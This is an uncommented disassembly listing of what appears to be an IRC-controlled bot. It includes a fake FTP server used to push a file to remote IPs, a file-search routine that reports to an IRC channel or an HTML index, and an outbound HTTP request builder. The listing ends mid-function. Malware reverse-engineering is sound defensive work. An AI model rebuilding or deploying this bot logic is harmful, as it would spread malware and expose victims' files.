loc_403E9F: ; CODE XREF: sub_403C3B+255�j
mov edi, offset aPass ; "PASS"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403EBC
push eax
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403EBC: ; CODE XREF: sub_403C3B+272�j
mov edi, offset aSyst ; "SYST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403ED9
push eax
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403ED9: ; CODE XREF: sub_403C3B+28F�j
mov edi, offset aRest ; "REST"
lea esi, [ebp+74h+var_AC]
mov ecx, edx
xor eax, eax
repe cmpsb
jnz short loc_403EF6
push eax
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403EF6: ; CODE XREF: sub_403C3B+2AC�j
push 4
mov edi, offset off_4211C0
lea esi, [ebp+74h+var_AC]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_403F14
push eax
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403F14: ; CODE XREF: sub_403C3B+2CA�j
mov eax, offset aType ; "TYPE"
mov ecx, edx
mov edi, eax
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz short loc_403F47
push 2
mov edi, offset aA_0 ; "A"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_403F47
push edx
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403F47: ; CODE XREF: sub_403C3B+2E9�j
; sub_403C3B+2FD�j
mov edi, eax
push 5
pop eax
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_403F78
push 2
mov edi, offset aI ; "I"
lea esi, [ebp+74h+var_334]
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_403F78
push edx
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403F78: ; CODE XREF: sub_403C3B+31A�j
; sub_403C3B+32E�j
mov edi, offset aPasv ; "PASV"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz short loc_403FB7
push 0Ah
pop ecx
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
lea edi, [ebp+74h+var_124]
rep movsd
lea eax, [ebp+74h+var_124]
movsw
lea edx, [eax+1]
loc_403FA3: ; CODE XREF: sub_403C3B+36D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403FA3
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_124]
jmp short loc_403FEB
; ---------------------------------------------------------------------------
loc_403FB7: ; CODE XREF: sub_403C3B+34B�j
mov edi, offset aList ; "LIST"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
mov ecx, eax
jnz short loc_403FF1
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
lea edi, [ebp+74h+var_C4]
rep movsd
movsw
lea eax, [ebp+74h+var_C4]
movsb
lea edx, [eax+1]
loc_403FDC: ; CODE XREF: sub_403C3B+3A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_403FDC
sub eax, edx
push 0
push eax
lea eax, [ebp+74h+var_C4]
loc_403FEB: ; CODE XREF: sub_403C3B+37A�j
push eax
jmp loc_404182
; ---------------------------------------------------------------------------
loc_403FF1: ; CODE XREF: sub_403C3B+38C�j
mov edi, offset aPort ; "PORT"
lea esi, [ebp+74h+var_AC]
xor edx, edx
repe cmpsb
jnz loc_4040B5
lea eax, [ebp+74h+var_2D0]
push eax
lea eax, [ebp+74h+var_F8]
push eax
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_29C]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_4147C3
lea eax, [ebp+74h+var_F8]
push eax
call sub_414972
mov esi, eax
lea eax, [ebp+74h+var_2D0]
push eax
call sub_414972
push 0Ch
mov edx, eax
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_F8]
rep stosd
push edx
push esi
stosw
lea eax, [ebp+74h+var_F8]
push offset aXX ; "%x%x\n"
push eax
call sub_4145E5
push 10h
lea eax, [ebp+74h+var_F8]
push 0
push eax
call sub_415409
mov [ebp+74h+var_10], eax
add esp, 44h
lea eax, [ebp+74h+var_28]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_14]
push eax
lea eax, [ebp+74h+var_C]
push eax
lea eax, [ebp+74h+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_4145E5
add esp, 18h
push 0
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_404182
; ---------------------------------------------------------------------------
loc_4040B5: ; CODE XREF: sub_403C3B+3C2�j
mov edi, offset aRetr ; "RETR"
lea esi, [ebp+74h+var_AC]
mov ecx, eax
xor edx, edx
repe cmpsb
jnz loc_40416A
push edx
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push [ebp+74h+arg_0]
call ebx
push [ebp+74h+var_10]
lea eax, [ebp+74h+var_48]
push eax
call sub_403B2C
cmp eax, 1
pop ecx
pop ecx
jnz short loc_40415F
call sub_403BA9
cmp eax, 1
jnz loc_404187
xor esi, esi
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push [ebp+74h+arg_0]
call ebx
lea eax, [ebp+74h+var_6D8]
push eax
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+74h+var_440], esi
jnz short loc_404150
push esi
push [ebp+74h+var_444]
lea eax, [ebp+74h+var_8DC]
push eax
lea eax, [ebp+74h+var_4C4]
push eax
push [ebp+74h+var_6DC]
call sub_4056FB
add esp, 14h
loc_404150: ; CODE XREF: sub_403C3B+4F0�j
lea eax, [ebp+74h+var_8DC]
push eax
call sub_401EFF
pop ecx
jmp short loc_404187
; ---------------------------------------------------------------------------
loc_40415F: ; CODE XREF: sub_403C3B+4AC�j
push 0
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_404182
; ---------------------------------------------------------------------------
loc_40416A: ; CODE XREF: sub_403C3B+488�j
mov ecx, eax
mov edi, offset aQuit ; "QUIT"
lea esi, [ebp+74h+var_AC]
xor eax, eax
repe cmpsb
jnz short loc_404187
push eax
push 0Dh
push offset a221Goodbye_ ; "221 Goodbye.\n"
loc_404182: ; CODE XREF: sub_403C3B+25F�j
; sub_403C3B+27C�j ...
push [ebp+74h+arg_0]
call ebx
loc_404187: ; CODE XREF: sub_403C3B+4B6�j
; sub_403C3B+522�j ...
mov esi, [ebp+74h+arg_0]
push 19h
pop ecx
xor eax, eax
lea edi, [ebp+74h+var_29C]
rep stosd
loc_404197: ; CODE XREF: sub_403C3B+151�j
; sub_403C3B+179�j ...
inc esi
cmp esi, [ebp+74h+var_4]
mov [ebp+74h+arg_0], esi
jle loc_403D68
loc_4041A4: ; CODE XREF: sub_403C3B+127�j
push 41h
pop ecx
xor eax, eax
push eax
push eax
push eax
lea eax, [ebp+74h+var_438]
push eax
mov eax, [ebp+74h+var_4]
inc eax
lea esi, [ebp+74h+var_228]
lea edi, [ebp+74h+var_438]
push eax
rep movsd
call ds:dword_4201EC
cmp eax, 0FFFFFFFFh
jnz loc_403D5A
loc_4041D5: ; CODE XREF: sub_403C3B+C9�j
; sub_403C3B+113�j
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 74h
leave
retn 4
sub_403C3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041E2 proc near ; CODE XREF: sub_404AFC+149�p
; sub_408A18+3927�p
var_598 = byte ptr -598h
var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
var_360 = byte ptr -360h
var_24C = byte ptr -24Ch
var_4C = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
push 41h
pop ecx
xor eax, eax
lea edi, [ebp+var_598]
rep stosd
mov edi, [ebp+arg_0]
xor ebx, ebx
push offset asc_4216D8 ; "\n"
push edi
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_415459
cmp [ebp+arg_8], ebx
pop ecx
pop ecx
jz short loc_40423B
push edi
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
add esp, 14h
jmp loc_404358
; ---------------------------------------------------------------------------
loc_40423B: ; CODE XREF: sub_4041E2+34�j
cmp [ebp+arg_C], ebx
jz loc_40433D
mov eax, edi
lea ecx, [eax+1]
loc_404249: ; CODE XREF: sub_4041E2+6C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404249
push edi
sub eax, ecx
and [eax+edi-1], dl
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_40427A: ; CODE XREF: sub_4041E2+9D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40427A
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea ecx, [eax+1]
loc_4042B4: ; CODE XREF: sub_4041E2+D7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4042B4
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
mov eax, edi
lea ecx, [eax+1]
loc_4042D4: ; CODE XREF: sub_4041E2+F7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4042D4
push 3Ch
push 96h
push 0E6h
sub eax, ecx
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 18h
lea ecx, [eax+1]
loc_40430B: ; CODE XREF: sub_4041E2+12E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40430B
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
add esp, 0Ch
jmp short loc_404358
; ---------------------------------------------------------------------------
loc_40433D: ; CODE XREF: sub_4041E2+5C�j
push edi
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
add esp, 10h
loc_404358: ; CODE XREF: sub_4041E2+54�j
; sub_4041E2+159�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_404361: ; CODE XREF: sub_4041E2+184�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404361
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
mov eax, [ebp+arg_C]
cmp eax, ebx
jz loc_40440B
lea edx, [eax+1]
loc_40438A: ; CODE XREF: sub_4041E2+1AD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40438A
sub eax, edx
cmp eax, 2
jbe short loc_40440B
mov eax, [ebp+arg_C]
lea edx, [eax+1]
loc_40439E: ; CODE XREF: sub_4041E2+1C1�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40439E
sub eax, edx
add eax, 0FFFFFFFDh
cmp eax, ebx
jz short loc_4043BA
loc_4043AE: ; CODE XREF: sub_4041E2+1D6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4043BA
dec eax
jnz short loc_4043AE
loc_4043BA: ; CODE XREF: sub_4041E2+1CA�j
; sub_4041E2+1D3�j
inc eax
push eax
push [ebp+arg_C]
lea eax, [ebp+var_598]
push eax
call sub_414670
lea eax, [ebp+var_598]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_24C]
push esi
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 1Ch
lea ecx, [eax+1]
loc_4043F0: ; CODE XREF: sub_4041E2+213�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4043F0
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
loc_40440B: ; CODE XREF: sub_4041E2+19F�j
; sub_4041E2+1B4�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_420054 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_420050 ; FindNextFileA
test eax, eax
jz loc_404838
mov ebx, 1FFh
loc_404437: ; CODE XREF: sub_4041E2+650�j
cmp [ebp+var_38C], 0
jz loc_404820
push 3
mov edi, offset a__ ; ".."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404820
push 2
mov edi, offset a__0 ; "."
lea esi, [ebp+var_360]
pop ecx
xor eax, eax
repe cmpsb
jz loc_404820
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_420068 ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_420064 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm ; "PM"
ja loc_404535
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_4044AE: ; CODE XREF: sub_4041E2+359�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+var_4C]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_4145E5
add esp, 20h
xor edi, edi
test byte ptr [ebp+var_38C], 10h
jz loc_404684
inc [ebp+var_8]
cmp [ebp+arg_8], edi
jz short loc_404540
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41483D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push 200h
push eax
call sub_41483D
add esp, 28h
jmp loc_4047EC
; ---------------------------------------------------------------------------
loc_404535: ; CODE XREF: sub_4041E2+2BE�j
movzx eax, ax
sub eax, 0Ch
jmp loc_4044AE
; ---------------------------------------------------------------------------
loc_404540: ; CODE XREF: sub_4041E2+308�j
cmp [ebp+arg_C], edi
jz loc_40463E
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_40456C: ; CODE XREF: sub_4041E2+38F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40456C
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS_2 ; "%s%s/"
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_4045AF: ; CODE XREF: sub_4041E2+3D2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045AF
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_4045D3: ; CODE XREF: sub_4041E2+3F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4045D3
sub eax, esi
cmp eax, 1Eh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_4045F5
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4045FA
; ---------------------------------------------------------------------------
loc_4045F5: ; CODE XREF: sub_4041E2+40A�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4045FA: ; CODE XREF: sub_4041E2+411�j
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40460D: ; CODE XREF: sub_4041E2+430�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40460D
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push ebx
jmp loc_4047DD
; ---------------------------------------------------------------------------
loc_40463E: ; CODE XREF: sub_4041E2+361�j
lea eax, [ebp+var_360]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_494]
push 106h
push eax
call sub_41483D
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_40466B: ; CODE XREF: sub_4041E2+4CA�j
lea eax, [ebp+var_24C]
push 200h
push eax
call sub_41483D
add esp, 24h
jmp loc_4047EC
; ---------------------------------------------------------------------------
loc_404684: ; CODE XREF: sub_4041E2+2FC�j
inc [ebp+var_4]
cmp [ebp+arg_8], edi
jz short loc_4046AE
push edi
push [ebp+var_36C]
call sub_402B3D
push eax
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_40466B
; ---------------------------------------------------------------------------
loc_4046AE: ; CODE XREF: sub_4041E2+4A8�j
cmp [ebp+arg_C], edi
jz loc_4047C2
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea esi, [eax+1]
loc_4046DA: ; CODE XREF: sub_4041E2+4FD�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4046DA
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
lea eax, [ebp+var_360]
push eax
push [ebp+arg_C]
lea eax, [ebp+var_24C]
push offset aSS ; "%s%s"
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 14h
lea esi, [eax+1]
loc_40471D: ; CODE XREF: sub_4041E2+540�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40471D
push edi
sub eax, esi
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
lea eax, [ebp+var_360]
lea esi, [eax+1]
loc_404741: ; CODE XREF: sub_4041E2+564�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404741
sub eax, esi
cmp eax, 1Fh
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_24C]
jbe short loc_404763
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_404768
; ---------------------------------------------------------------------------
loc_404763: ; CODE XREF: sub_4041E2+578�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_404768: ; CODE XREF: sub_4041E2+57F�j
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_24C]
add esp, 10h
lea edx, [eax+1]
loc_40477B: ; CODE XREF: sub_4041E2+59E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40477B
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+var_4C]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_24C]
push ebx
push eax
call sub_41483D
add esp, 1Ch
jmp short loc_4047EC
; ---------------------------------------------------------------------------
loc_4047C2: ; CODE XREF: sub_4041E2+4CF�j
push [ebp+var_36C]
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_360]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h
loc_4047DD: ; CODE XREF: sub_4041E2+457�j
lea eax, [ebp+var_24C]
push eax
call sub_41483D
add esp, 18h
loc_4047EC: ; CODE XREF: sub_4041E2+34E�j
; sub_4041E2+49D�j ...
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4047F5: ; CODE XREF: sub_4041E2+618�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4047F5
push edi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
cmp [ebp+arg_8], edi
jz short loc_404820
push 0FAh
call ds:dword_420000 ; Sleep
loc_404820: ; CODE XREF: sub_4041E2+25C�j
; sub_4041E2+274�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz loc_404437
loc_404838: ; CODE XREF: sub_4041E2+24A�j
push [ebp+var_C]
call ds:dword_42004C ; FindClose
xor esi, esi
cmp [ebp+arg_8], esi
jz short loc_40487D
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_402B3D
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_402B3D
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+var_24C]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_4145E5
add esp, 14h
jmp short loc_4048AB
; ---------------------------------------------------------------------------
loc_40487D: ; CODE XREF: sub_4041E2+664�j
cmp [ebp+arg_C], esi
lea eax, [ebp+var_24C]
jz short loc_404897
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_4048AB
; ---------------------------------------------------------------------------
loc_404897: ; CODE XREF: sub_4041E2+6A4�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_4145E5
add esp, 10h
loc_4048AB: ; CODE XREF: sub_4041E2+699�j
; sub_4041E2+6B3�j
lea eax, [ebp+var_24C]
lea edx, [eax+1]
loc_4048B4: ; CODE XREF: sub_4041E2+6D7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4048B4
push esi
sub eax, edx
push eax
lea eax, [ebp+var_24C]
push eax
push [ebp+arg_4]
call dword_43587C ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4041E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048D6 proc near ; CODE XREF: sub_404AFC+12B�p
var_40C = byte ptr -40Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
push ebx
push esi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov [ebp+var_4], 400h
mov [ebp+var_C], esi
call ds:dword_420044 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404993
push esi
push ebx
call ds:dword_420094 ; GetFileSize
mov edx, eax
cmp edx, esi
mov [ebp+var_8], edx
jz short loc_40498C
push edi
jmp short loc_404924
; ---------------------------------------------------------------------------
loc_404921: ; CODE XREF: sub_4048D6+B3�j
mov edx, [ebp+var_8]
loc_404924: ; CODE XREF: sub_4048D6+49�j
xor eax, eax
cmp [ebp+var_4], edx
mov ecx, 100h
lea edi, [ebp+var_40C]
rep stosd
jbe short loc_40493B
mov [ebp+var_4], edx
loc_40493B: ; CODE XREF: sub_4048D6+60�j
push 2
push esi
neg edx
push edx
push ebx
call ds:dword_420090 ; SetFilePointer
push esi
lea eax, [ebp+var_C]
push eax
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push ebx
call ds:dword_42008C ; ReadFile
push esi
push [ebp+var_4]
lea eax, [ebp+var_40C]
push eax
push [ebp+arg_0]
call dword_43587C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_404986
call dword_4358A0 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_40498B
xor eax, eax
loc_404986: ; CODE XREF: sub_4048D6+9F�j
sub [ebp+var_8], eax
jnz short loc_404921
loc_40498B: ; CODE XREF: sub_4048D6+AC�j
pop edi
loc_40498C: ; CODE XREF: sub_4048D6+46�j
push ebx
call ds:dword_42003C ; CloseHandle
loc_404993: ; CODE XREF: sub_4048D6+31�j
pop esi
pop ebx
leave
retn
sub_4048D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404997 proc near ; CODE XREF: sub_404C6A+182�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push ebx
mov ecx, eax
push esi
xor esi, esi
lea edx, [ecx+1]
loc_4049A6: ; CODE XREF: sub_404997+14�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4049A6
sub ecx, edx
mov [ebp+arg_0], ecx
jz short loc_4049D1
loc_4049B4: ; CODE XREF: sub_404997+38�j
cmp byte ptr [esi+eax], 5Ch
jnz short loc_4049BE
mov byte ptr [esi+eax], 2Fh
loc_4049BE: ; CODE XREF: sub_404997+21�j
mov ecx, eax
inc esi
lea edx, [ecx+1]
loc_4049C4: ; CODE XREF: sub_404997+32�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_4049C4
sub ecx, edx
cmp esi, ecx
jb short loc_4049B4
loc_4049D1: ; CODE XREF: sub_404997+1B�j
pop esi
pop ebx
pop ebp
retn
sub_404997 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049D5 proc near ; CODE XREF: sub_408A18+5232�p
var_4A4 = byte ptr -4A4h
var_314 = byte ptr -314h
var_114 = byte ptr -114h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A4h
push edi
lea eax, [ebp+var_4A4]
push eax
push 101h
call dword_4357F8 ; WSAStartup
push 6
push 1
push 2
call dword_4357E8 ; socket
push [ebp+arg_14]
mov [ebp+var_4], eax
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
mov [ebp+var_14], 2
call dword_435934 ; ntohs
push [ebp+arg_10]
mov [ebp+var_12], ax
call sub_407C3B
pop ecx
mov [ebp+var_10], eax
push 10h
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call dword_4357A0 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_404AB5
mov eax, [ebp+arg_20]
test eax, eax
jnz short loc_404A48
mov eax, (offset asc_420AE8+2)
loc_404A48: ; CODE XREF: sub_4049D5+6C�j
push ebx
push esi
push [ebp+arg_10]
mov ebx, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+var_114]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push ebx
push eax
call sub_41483D
lea eax, [ebp+var_114]
add esp, 1Ch
lea esi, [eax+1]
loc_404A77: ; CODE XREF: sub_4049D5+A7�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404A77
push 0
sub eax, esi
push eax
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
call dword_43587C ; send
push 40h
